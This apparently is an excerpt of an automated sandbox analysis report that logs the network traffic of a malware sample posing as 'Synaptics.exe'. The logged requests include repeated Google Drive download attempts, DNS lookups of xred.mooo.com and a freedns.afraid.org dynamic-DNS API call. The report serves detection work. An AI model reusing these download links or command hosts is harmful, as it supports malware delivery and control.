                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
Source: global traffic
HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
Source: global traffic
DNS traffic detected: DNS query: docs.google.com
Source: global traffic
DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic
DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic
DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5LW8KWFdf7WMzgVOKWjf4IF7bNdIVOTWuexsLEbEaKfG80j5InKOJtoOk2-WuWZ0K5Drig-y8
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:23:06 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-EVdNpbwuN1QWJcBMFv02Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67q00C5o_iFOdziiaR8j4UF2FaCVSMZGyb9EXjcE92JYRxbxlUTvNDiYky6tUoOVUOtSOZ9fIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:19 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-XP8sndq2gKVeH2CbBIJ_aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MdkIb6jfZdquRZH2DutGXlT2pXQoze3zO1jqmm4-YD2lIq9-mWBCa9Rxxo-2tStEU49s3298Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-nllpoLKxVhNqGPZ_Xi1waw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ZL7jZETWOdw9ez3hWjVKzzAlrLiB-a_o-UFF3R9T2Rwi5xVK7KV8cLKPVjpgWCJBbaBCLqVoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-X_aDOfXI0bC16acdRcR0Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XXbI-vE8QyrFx0mNffaOVDhpDMQ93tGeLEpt8P0RNfBbVSsZP4QIlP400FUznQcM3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:22 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-RWIuIJr2itQKpTqFlt0DRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Tfmin-xJHMPsXKvU440hGWC3EKIfnkTfHdVWT42uKnOo-Pfl4710PAJaB2xAbqUM5zKbzwyQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xR1V8mR_Ph1vVYEWdBRfNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5KeSs4HnPBWgOkUlGJtnBsPYzT91RVoCvEFgC4i2OJognPef2dO63njyeUbNVs0acXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d0jFUUaeKHrMltp4L215pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Zq8sTeMBuEhW9JUqnl0HI1zzCMSCevXuS2Zf1e0ZMoJ7nvvt59BfNaPnDWZd2y4-zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yC2sheh8fLVQg13vR2614Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4rBfxh_2NjrexE68ed_ywLpzGraTm7-5ay0X3TFOxkY2psU7uHBbxOxi8AzkQrnjfHZMtBiusContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ty3dGGW3iXHtJn3rKJywzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6NAdVvlnTiwM_L4fBg5PuYVmpGC33E-AAMivc4XE7BldObXMtrIXfBsfc0cGVRWGYkVqqKr7sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:26 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-dkRAlg9JvKozKWcv38QnjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7SMVOMk_A5U6vF4up5ioHeyx-W4FaELMvnUZJvOBdc7LA8y7CSbJUX0QfEr28DuC12Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:26 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ou2H1DRG1L2kuRU1ll2jdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4OzBk4dpquZlpfSpwAbFy05Zb-MzvoQAbViwLtbQUFVbYzncyVmFCTD8OJQMrWA_bkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:27 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-UyqLuZKg2-EH53C1rRO9FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gW68JiHyKqt-DQkT8jRhES9JdVAbKZSuObf5DLyuq6yJX7lVJ3GO_5nU5JRNHo-LhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4AU1pTYZl405Zu85GtCLDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, 